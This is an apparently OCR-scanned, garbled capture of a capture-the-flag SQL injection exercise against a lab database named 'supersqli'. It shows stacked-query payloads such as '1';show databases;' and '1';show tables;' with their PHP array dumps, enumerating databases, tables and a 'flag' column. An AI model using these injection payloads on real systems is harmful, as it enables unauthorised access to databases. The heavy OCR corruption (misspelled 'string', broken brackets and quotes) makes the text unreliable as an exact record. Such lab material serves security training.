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array(2) |
[01=>
ztring (1) “1°
[11=>
string (7) “hahahah”
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array(2) {
[0]=>
string (13 "2
[1]=>
string (12) “miaomiaomiac”
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rrrrr 1064 : You have an error in your SQL symtax: check the manual that corresponds to your MariaDB server version for the right syntax to use near "'1777 at line 1

1';show databases;
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2z (1 || 12 |

array(2) |
[0]=>
string (1) “17
[1]1=>
string (7)) “hahahah®

array(l) |
[0]=>
string(11) "ctftraining”
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arrayil) {
[01=>
ztring (18] "information_schema”

arrayil) {

[01=>

ztring () “my=ql”
1

array(l) |
[0]=>
string (18) "performance_schema”

arrayil) {
[01=>
ztring (8) “supersgli”

}

array(l) |
[0]=>
string (4) “test”

1';show tables;
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array(2) |
[01=>
string (1) "1
[11=>
ztring (7) “hahahah®
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}

arrayil) {

[01=>

string (16) "1919810931114514"
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array(l) |
[a]=>
ztring (5) “words”

}

1';show columns from ~1919810931114514" ;
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array(2) |
[0]=>
string (1) “1
[1]1=>
string (7)) “hahahah®
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arrav(f) |
[0]=>
string(4) “flag”
[1]1=>
string (12) "varchar {100)"
[2]=>
string (2) “NO"
[3]1=>
string(0) *"
[4]1=>
NILL
[51=>
string (01 "
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